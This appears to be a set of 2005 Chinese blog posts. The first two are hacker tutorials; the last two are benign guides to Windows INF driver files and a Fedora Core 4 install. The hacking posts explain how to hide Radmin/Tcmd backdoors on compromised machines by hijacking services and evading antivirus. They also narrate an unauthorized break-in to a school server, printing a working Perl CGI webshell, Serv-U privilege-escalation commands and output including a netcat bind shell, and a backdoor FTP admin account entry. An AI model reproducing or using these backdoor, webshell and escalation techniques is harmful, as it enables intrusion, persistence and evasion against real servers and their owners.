这样就完成替换了,现在看看吧,怎么样?net stop r_server,没有这个服务了吧,哈哈!但是我们的端口还是在监听哦!连接看看,还可以连接上的哦!
修改到这里,我们的Radmin算是真正在系统里扎下根了,很难被发现了。还有一个我比较喜欢的命令行下的工具是Tcmd,大概大家都知道,就是可以监听指定端口,等我们连接的时候可以得到一个cmdshell。这个东西简单易用,体积还特别小,但是缺点比Radmin还显而易见,那个”Windows Kernel Service”一看就是做木马的,而且服务描述里是空,进程的名字也很显眼,熟悉一点的人就会发现。对于这样的不是很完善的木马,我们不会编程,但是还是可以用很简单的办法来让他变得隐藏并且来为我们服务的。我们在肉鸡的cmdshell下安装tcmd,具体的帮助请看tcmd /?
tcmd -install 1418 jnc
好了,服务安装完之后他需要的一些参数什么的信息就存到注册表里了,我们看到服务管理器里多了个Windows Kernel Service,缺点就是刚才提到的隐藏不够好。现在我们按照刚才的思路,Sc删除后他的信息还可以继续为我们工作哦!还是替换”配置性能日志和警报”服务,改他的可执行文件路径就OK了。我的操作如下:
sc config sysmonlog start= auto
sc config sysmonlog binpath= “c:\winnt\system32\sm1ogsvc.exe”
net start sysmonlog
sc delete “Windows Kernel Service”
自己理解一下这些是做什么的吧!看看,已经很隐蔽了吧!这可是我们的自己的Tcmd哦,看看成果吧!如图二。想办法让他躲过杀毒软件的查杀,嘿嘿……!
这里只是谈了这两个的修改,其实还有很多其他的,譬如一些木马的隐藏不高的话,你都可以这样修改的。还有就是自己对木马的完善,我就不说了,譬如名字的技巧,我这里用的是1和l,你还可以用0和O等来混淆别人的眼睛,如果对付只会用任务管理器的人,你可以改成svchost.exe放到system等目录下,这样他们就没有办法了。还有就是程序的图标,不够隐蔽的话可以自己去修改的。还有个人认为比较好的就是把木马的配置和Winrar一起来做成自己的木马,过程我就不讲了,以前的黑X有好多介绍了。还有最近不是有个反弹端口的工具么,完全可以加在里面把端口反弹出来,因为网上已经有人这么做出来了,我就不写了,自己想一下做成自解压的EXE文件就可以了。
分类 : 技术文摘 | 发表时间 15-10-2005
一个多月的时间里,渗透过上百台服务器,有独立的,有虚拟主机的,有群组的,有国内和国外,我发现一个极其严重的问题,国外的服务器,普遍安全性都非常高,管理员的安全意识非常高,做个比例,如果国内平均每 10 台服务器,能渗透进去 6 台甚至更多,那国外、台湾的,平均每 10 台服务器仅仅能渗透 1 台。当然我的水平也是一个问题。可是却反映出国内的管理员的水平的的确确比国外的要差几个档次。国内的管理员的技术和意识,迫切需要大幅度提高。
不过国内的也有比较 BT 的管理员,我就遇见几个服务器设置得非常。其中一个的 Documents and Settings 目录下还有 nsfocus 目录,难道是 nsfocus 公司帮做的安全?这个服务器我们没有拿下,还有另外一个,就是今天的重点。
一次看见了一个学校论坛(http://www.*****.com),还蛮火爆的,顿时兴趣来了, ping 了一下,发现 4 个包都返回 Request timed out. 估计是搞了策略或者防火墙的,象我这种以 Web 安全的,自然喜欢从站点上找漏洞,自从学习 Web 开始,我就落下一个怪癖,就是如果实在从 Web 上找不到什么漏洞,宁愿放弃也不用什么漏洞扫描器。
大概看了看站点。就是一个论坛,采用 LeadBBS ,拿这个论坛没辙,还有其他办法,因为刚才我访问这个 IP ,返回“No web site is configured at this address.”,初步判断是虚拟主机,前段时间那几个黑站狂黑站的成功几率为什么这么高?因为有 http://whois.webhosting.info 这个网站,可以查询一个 IP 上,绑定了多少个域名。如果真的是虚拟主机,这个学校论坛没有漏洞,不代表其他站点就没有,很快的,我就通过一个小公司站点( http://anyhost/ )上的 DVBBS 6.0 传了一个 aspshell 上去,谁知道仅仅能够对自己的目录进行操作。而且自己的目录没有执行程序的权限,又用不了 Nfso ,手工跳转 URL 中的目录,也没有多少个可以浏览的,重要的 Program Files 和 Documents and Settings 目录都看不了,从 aspshell 反馈的信息来看,每个站点都设置了单独的用户,似乎一切都陷入僵局。
没有目的的跳转目录着……
我习惯性的在 URL 跳转到 c:\php,没想到居然可以看见了,那这个主机很可能就会支持 php 了,马上传了一个 phpspy 上去,非常幸运,顺利看到了登陆入口,可是没想到进入以后才发现,php.ini 亦设置得异常 BT,安全模式打开了, phpinfo 函数也被禁用了,看不了详细的系统信息,不过看 phpspy 自带的探针可以发现,allow_url_fopen、display_errors、 register_globals 统统关闭,system、passthru、exec、shell_exec 几个函数都无一幸免的被禁用了,直接跳转目录还是只可以看到这些目录而已,各个站点的目录都是类似于 “D:\websites\school.com#dlfjurdlkfjk” 这样的,每个站点目录后面的那些字符串都不一样,也跳转不到,后来我猜测后面的字符串就是 ftp 密码,试验了一下,无法登陆,看似柳暗花明,希望又破灭了……
结束了吗?不,我试着 FTP 一下:
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator>ftp www.*****.com
Connected to www. school.com.
220 Welcome to FTP Server…
User (www.bjtrq.com:(none)):
331 User name okay, need password.
Password:
530 Not logged in.
Login failed.
ftp> bye
221 Goodbye!
从返回的信息判断,我们还是有希望的。尽管他修改了 FTP Server 的 Banner,但是从 User name okay, need password. 这句我们还是大胆的判断这个服务器就是采用 Serv-U ,我上手有目前所有版本 Serv-U 本地提升权限的 Exploit ,如果我能传一个上去,并且能够执行,一切就明朗了。再仔细想想有哪个目录可以写的?当时在 c:\php 目录下没有发现 sessiondata 目录,而且也不是自动安装版,估计管理员把 session 的目录换到其他地方了,不然这个目录是 everyone 可写的……
还有就是 Perl,这个是个很大的突破口,因为 Perl 目录一般要 erveryone 完全控制的,不管他用 isap 还是 perl.exe 一般都是可写、可执行的,马上下载 Perl 的快捷方式来看看路径,呵呵,看到了,原来 D:\user\bin 就是存放 perl 的 bin 目录下的所有文件,这么说这个目录可能可以写,也可能可以执行咯,马上传一个 su.exe(针对目前所有版本的 Serv-U 本地提升权限漏洞)上去,呵呵,传上去了,太好了,现在就是执行了,刚才我们试了 aspshell、phpshell 都不行,现在就看最后的希望了,找呀找啊,终于在我硬盘上找到一个 cgishell,很老了,文件日期是 2002 年 6 月 30 日的,代码如下:
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, “Content-type: text/html\r\n\r\n”, 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, “<HTML><PRE>\r\n”, 13);
open(STDERR, “>&STDOUT”) || die “Can’t redirect STDERR”;
system($execthis);
syswrite(STDOUT, “\r\n</PRE></HTML>\r\n”, 17);
close(STDERR);
close(STDOUT);
exit;
我用过最好的 cgishell ,保存为一个 cgi 文件执行,晕……居然不支持!一阵阵郁闷袭来,2 秒钟的郁闷后,想到还有一线希望,那就是pl ,我们还没有试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir ,我的天啊!!
显示“拒绝访问”,终于可以执行了!太兴奋了,马上提交:
http://anyhost//cmd.pl?d:\user\bin\su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe “command”
Example: serv-u.exe “nc.exe -l -p 99 -e cmd.exe”
嘻嘻~~现在是 IUSR 权限,那又怎么样?看你这次还不死?提交:
http://anyhost//cmd.pl?d:\user\bin\su.exe “cacls.ex … T /G everyone:F”
http://anyhost//cmd.pl?d:\user\bin\su.exe “cacls.ex … T /G everyone:F”
http://anyhost//cmd.pl?d:\user\bin\su.exe “cacls.ex … T /G everyone:F”
http://anyhost//cmd.pl?d:\user\bin\su.exe “cacls.ex … T /G everyone:F”
返回下面的信息,就表示成功了!!!
Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready…
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain…
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting.
..
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
******************************************************
每提交完一次都稍微等一下,因为这些命令需要时间处理的,不一会儿,就把所有分区设置为 everyone 完全控制了,可以任意操作硬盘的东西了,但是有些命令还是受了限制,因为权限还没有提升,现在我们把自己的用户提升为管理员:
http://anyhost//cmd.pl?d:\user\bin\su.exe ” net l … s IUSR_anyhost /add”
现在我们通过 web 方式,执行的命令就是以 administrator 的身份执行的了,相信到这里,下面的事该做什么,大家应该知道了吧?马上找到那个学校的目录,进去咯~~目的达到了,本来还想做一个 3389 的肉鸡的,想想算了,这种 BT 管理员的地盘,我也占领不了多久,留点提示到他的桌面就 over 了。
说真的,搞安全这么久,从来没有遇见这么棘手的虚拟主机,要不是装了 Perl,还真是束手无策!本文技术含量不高,只是分享一下希望其中的思路,如果有一个人从中受益,这篇文章就完成它的使命了。
原来我还忘记了一个最重要的目录, C:\Documents and Settings\All Users ,从这个目录可以知道很多信息,这个目录一般、至少都是 everyone 可读的,这样我们就可以知道好多有用的信息了,直接通过我的 aspshell 手工跳转到这个目录,呵呵。马上看到了想看的目录树。
Application Data
Documents
DRM
Favorites
Templates
「开始」菜单
桌面
马上试试建目录,可惜里面的目录包括子目录都无法新建, BT 管理员权限设置得还真严格,不过我们还是有收获的,那就是 “C:\Documents and Settings\All Users\ 「开始」菜单 \ 程序 \”目录里,看到了很多决定结果的有用信息,
ActiveState ActivePerl 5.8
Administrative Tools
Deerfield.com
DTemp
IPSentry
MBM 5
NetMeter
Network ICE
Persits Software AspEmail
Persits Software AspJpeg
Serv-U FTP Server
Symantec Client Security
Windows 优化大师
WinRAR
启动
管理工具
附件
呵呵,现在我们知道了好多有用的信息了,看着这些东西,可以看得出管理员对安全、效率很在意,装了 Perl,也就是说可能支持 cgi 了, IPSentry 这个可以实时检测网站的各类服务, 当某服务停止时, 该软件会打 Pager, 或 EMAIL,或发声,或运行其它软件来提醒管理员,确保服务器出现问题能及时处理,说明管理员比较负责任,NetMeter 可以对网络流量进行监控,装了黑冰防火墙和诺顿杀毒服务器版,说明管理员对于服务器的安全是很小心的,这还不算,还装了另外一个防火墙——VisNetic Firewall,真是 BT 到家了,装了优化大师,看得出这个管理员还是比较爱清洁的。从管理工具里面我们还看到了终端服务客户端生成器.lnk 、终端服务配置.lnk ,还有终端服务,这下好了,说不定顺利就可以多一台 3389 肉鸡了。
先通过 aspshell 下载 Serv-U 的任意一个快捷方式,然后本地查看属性的目标,呵呵,原来 Serv-U 的目录是 “C:\Program Filesewfq4qrqtgy4635\Serv-U\” ,这下好了,直接跳转目录。OH~,yes~~,看到了,马上修改 ServUDaemon.ini文件,这个服务器居然放了 280 个用户,狂晕……不管了,先在添加 [Domain1] 里加一行:
User281=angel|1|0
然后加上
[USER=angel|1]
Password=ng98F85379EA68DBF97BAADCA99B69B805
HomeDir=D:\websites
RelPaths=1
TimeOut=600
Maintenance=System
Access1=D:\websites|RWAMELCDP
SKEYValues=
添加一个 angel,密码为 111111 的用户,具有最高权限执行,然后我们就可以 ftp 上去 quote site exec xxxxxxxx 了,嘻嘻偷笑中……
不过残酷现实再一次粉碎了我的计划,修改好文件以后提交,居然是没有修改成功,看来还是权限,权限权限整惨人啊。
不过还是有希望的,因为刚才我们看到了系统装了黑冰,有些版本存在“ISS RealSecure/BlackICE 协议分析模块 SMB 解析堆溢出漏洞”,可以远程利用的,手头上没有编译器,没有办法编译代码。
分类 : 技术文摘 | 发表时间 14-10-2005
相信朋友们对驱动程序的作用和安装应该不会陌生,但INF文件与驱动程序究竟有何关系呢?其实,INF是Device Information File(设备信息文件)的简称,设备管理器通过读取相应的INF文件来安装驱动程序,其中记录了驱动程序安装的所有操作,包括复制文件到指定路径、添加或修改注册表、加载系统服务等,而实际的驱动程序则存放在sys、dll、vxd等文件中。
INF文件的构成
在C:\Windows\下有一个名为INF的隐藏文件夹,我们可以找到很多??.INF、??.pnf格式的文件,前者即所谓的设备信息文件,后者是预编译信息文件。用记事本可以打开INF文件,其中记录了必要的硬件安装信息,包括设备类型、设备生产厂商名称、适用产品等信息,Windows可以据此自动安装驱动程序。如图1所示,这是CPU的INF文件,笔者以此为例介绍主要构成部分:
1. [version]:版本信息
Signature=”WINDOWS NT”:这表示驱动程序适用于Windows 2000/XP操作系统,如果是Windows 9x/Me则应该是“CHICAGO”。
Class:设备类型,这里的“Processor”表示中央处理器,即我们通常所说的CPU。如果是显卡设备的INF文件,这里会显示为“Display”,光驱设备是“CD-ROM”,显示器是“Monitor”,声卡等多媒体设备是“Media”,网卡是“Net”,打印机是“Print”,摄像头是“Image”。
DriverVer:设备驱动程序的版本和发布日期
2. [Manufacturer]:生产厂商信息
3. [DestinationDirs]:驱动程序安装路径
DefaultDestDir = 12:这里的“12”表示将驱动程序文件安装到\Windows\文件夹下,如果是“11”则表示将驱动程序文件安装到C:\Windows\System32\文件夹下。
4. [Processor_Calss_Addreg]:向注册表中添加的键值
安装INF文件
通常情况下,硬件厂商已经将驱动程序打包为一个安装程序或自解压程序,我们只需直接执行Setup.exe或??.exe即可,不过笔者建议还是安装INF文件为好,这样不会同时安装一些无用的垃圾文件。
第一步:解压缩驱动程序
如果下载回来的驱动程序是一个ZIP格式的压缩包,首先将其解压缩;如果下载回来的驱动程序是一个EXE格式的自解压文件,请使用WinRAR或WinZIP释放到一个临时文件夹中,然后查找到其中的INF文件。
第二步:安装INF
在“我的电脑”或“资源管理器”中右击刚才找到的INF文件,执行“安装”命令就可以了。这是因为微软在Windows中提供了Setup API,驱动程序开发人员不需要考虑接口、安装等事情。
INF高级应用实例
利用INF文件,我们可以完成很多意想不到的操作,这里通过几个实例进行说明:
实例一:完全删除驱动程序
很多情况下,当我们将不需要的硬件设备从系统拔出或取消连接后,其驱动程序并未从系统中真正删除,系统中仍然保留了这些设备的驱动程序文件和信息,时间一长,不仅会导致系统越来越庞大,而且这些顽固的驱动程序可能会影响新设备的安装,因为Windows会自动记忆曾安装过驱动程序的设备的INF文件信息,当我们再次安装同类型硬件时,系统会自作聪明的自动安装旧硬件的驱动程序,而拒绝接受新的驱动程序。
例如笔者所使用的笔记本电脑,虽然提供了IEEE 1394接口,但由于平时并不使用相应设备,于是打算将其从系统中彻底卸载。首先从“控制面板”打开“设备管理器”窗口,在“IEEE 1394总线主控制器”下选择“Texas Instruments OHCI Compliant IEEE 1394 Host Controller设备”,右击后切换到“驱动程序文件详细信息”窗口,如图2所示,这里清楚地列出了该设备所对应的全部驱动程序文件的详细路径,请记录下来一一删除即可。对于未能正确显示驱动程序文件信息的设备,我们可以用记事本打开相应的INF文件,在[SourceDisksFiles]小节查找所有的??.dll、??.vxd、??.drv、??.exe、??.ini等类型的文件名,记录下来后手动删除。
接下来,我们还需要进入C:\Windows\INF\文件夹,这里找到了1394.INF、1394vdbg.INF两个文件,将其全部删除就可以了。
实例二:未通过WHQL认证的设备驱动程序的INF文件
对于未通过微软WHQL认证(微软数字签名认证)的设备驱动程序,安装后你可能无法找到其对应的INF文件,它们的位置在哪里呢?
原来,Windows对于那些未通过WHQL认证的设备驱动程序,安装时并未直接将相应的INF文件复制到C:\Windows\INF\文件夹中,而是进行了重新命名,以便系统识别和管理,当然这些文件的位置并未改变。它们的文件名以oem*开头,这里的“*”代表具体的数字,从0开始,其内容构成与普通的INF文件没有什么区别。
实例三:让Windows 98自动安装驱动程序
由于诸多原因,现在仍有部分朋友在使用Windows 98,由于发布较早,Windows 98对新硬件的识别不是很好,例如对目前热门的USB闪存盘就无法做到即插即用,而且插入的网卡通常也需要安装驱动程序,否则将无法正常使用。
在Windows 98安装光盘的\Tools\reskit\INFinst\文件夹中提供了一个名为INFinst.exe的硬件信息安装程序文件,我们可以利用这个程序将相应设备的驱动程序手动集成至Windows 98的安装文件,以后在安装操作系统时,安装程序会自动检测所有已连接的硬件设备,并自动安装相应的驱动程序。
实例四:让Windows认识改造硬件
Analog Device公司为板载声卡提供了配套的SoundMAX驱动程序,通过安装在主板上的Codec与预告加载的音频渲染软件结合在一起,提供了广受欢迎的Yamaha DLSbyXG音色库和Sensaura 5.1 Virtual Theater环绕声,并且支持所有主流游戏音频技术,可惜的是只支持AD188x、AD189x、AD198x等有限的芯片。如果你的板载声卡使用了其他公司的芯片,在安装时将无法继续。
不过,通过某些技术手段,我们可以让非AD1985芯片的板载声卡安装SoundMAX驱动程序,这自然又要用到INF文件了。首先,从http://www.mydrivers.com/dir105/d42111.htm下载5.12.5243 WDM版本的SoundMAX驱动程序,下载时请注意对应相应的操作系统版本,将下载回来的文件解压缩,在“\SMAXWDM\W2K_XP\”文件夹有三个INF文件,其中smwdmCH4.inf文件对应的是Intel系列的ICH4芯片,smwdmCH6.INF对应的是Intel系列的IC6芯片,由于笔者使用的是VIA系列的芯片组,因此这里选择了smwdmCH5.inf,用记事本打开后定位到[AnalogDevices]小节的最后一行,按照固定的格式将板载声卡的ID号添加过来。
板载声卡的ID号,可以在“DirectX诊断工具→声音”窗口中查看到,例如“PCI\VEN_1106DEV_3058SUBSYS_001214C0REV”,添加时请注意使用相同的格式,另外必须将两个“&&”符号补充在相应的位置,以保证足够的字符个数,否则安装时仍然会无法通过。接下来,我们就可以顺利安装SoundMAX驱动程序了。
分类 : 技术文摘 | 发表时间 05-10-2005
刚刚下载完FC4,安装完了,现在把我安装的大体经过写一下,仅供参考。
一,硬盘安装:
1.下载 iso文件:
FC4-i386-DVD.isohttp://download.fedora.redhat.com/pub/fedora/linux/core/4/i386/iso/FC4-i386-DVD.iso
放在一个 fat32 或ext3分区上,我是:Windows Xp+ Fedora Core 4 双启动,下载完ISO文件放在一个Fat32分区上(最好不要放在NTFS分区上),然后用 WinRAR 提取ISO文件里的isolinux 目录一个分区上(如:可以在Windows Xp 里面用WINRAR提取 光盘镜像里 isolinux 目录到C:\下)。
2.下载:Grub For Dos :
http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&op=geninfo&did=3608
解压到C:\下,编辑 boot.ini 文件,加入:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS=”Microsoft Windows XP Professional” /noexecute=optin /fastdetect
C:\grldr=”GRUB For Dos/Windows ”
编辑C:\boot\grub\menu.lst 加入:
title Install-Fedora Core 4
kernel (hd0,0)/isolinux/vmlinuz
initrd (hd0,0)/isolinux/initrd.img
3.重新启动电脑,依次选择: GRUB For Dos/Windows > Install-Fedora Core 4
进入安装程序,在安装过程中当进行到选择安装介质时,选 硬盘安装。
4.按提示一步步安装,直到完成重启!
5.安装完成后运行 yum update 更新系统
#rpm -import /usr/share/rhn/RPM-GPG-KEY-fedora
#yum update
6.安装中文输入法Fcitx
下载 Fcitx-3.1:http://www.linuxfans.org/nuke/modul…geninfo&did=360
安装: #rpm -ivh fcitx-3.1-1mgc.i686.rpm
7.在/etc/X11/xinit/xinput.d下面创建一个自己的输入法的脚本 fcitx 内容为:
XIM=fcitx
XIM_PROGRAM=fcitx
GTK_IM_MODULE=fcitx
gnome-im-settings-daemon >/dev/null
添加配置:
#alternatives –install /etc/X11/xinit/xinput.d/zh_CN xinput-zh_CN /etc/X11/xinit/xinput.d/fcitx 100
#alternatives –auto xinput-zh_CN
重启X Window 生效!
8.安装Mp3播放器XMMS( FC4中默认是没有XMMS的)
#yum install xmms
2.安装mp3 插件:xmms-mp3-1.2.10-2.2.p.1.fc2.fr.i386.rpm :
http://www.linuxfans.org/nuke/modules.php?name=Site_Downloads&op=geninfo&did=3060
#rpm -ivh xmms-mp3-1.2.10-2.2.p.1.fc2.fr.i386.rpm
3.安装Realplayer:http://www.linuxfans.org/nuke/modul…eninfo&did=3166
#rpm -ivh RealPlayer-10.0.4.750-20050401.i586.rpm
4.安装LumaQQ的话去下载lumaqq然后解压就可以用的,很简单的。
还有一个必备软件就是星际译王了。我们可以到它主页下载主程序包http://stardict.sourceforge.net/stardict-2.4.4-1.i386.rpm
sdcv-0.1.tar.bz2这个是字符下用的
WyabdcRealPeopleTTS这个是语音文件
#rpm -Uvh stardict-2.4.4-1.i386.rpm
安装主程序
字典到http://stardict.sourceforge.net/Dictionaries_zh_CN.php下载,自己因需选
如何关闭 ipv6 以解决域名解析慢的问题:将下面两行追加到 /etc/modprobe.conf
alias net-pf-10 off
alias ipv6 off
美化字体不许要补丁,也不需要打命令,方法如下:
1:安装完毕后进入
[root@S01 ~]#cd /usr/share/fonts/chinese/TrueTypa
2:删除:ghai00mp.ttf/gbsn00lp.ttf/bsmi00lp.ttf/bkai00mp.ttf四个字体文件
[root@S01 ~]#rm -rf ghai00mp.ttf gbsn00lp.ttf bkai00mp.ttf
3:将simsun.ttc重命名为:ghai00mp.ttf和bkai00mp.ttf,并放到/usr/share/fonts/chinese/TrueTypa下
simsun 下载地址: http://ants.keepso.com/cgi-bin/bfile?word=simsunttc
4:重起系统就可以看到保留英文字体,而中文字体变成新宋体的操作界面了!
如何让x0mms播放列表里显示正确的中文(myxfc)
-*-*-*-*-*-iso8859-1,-misc-simsun-medium-r-normal–12-*-*-*-*-*-gbk-0,*-r-
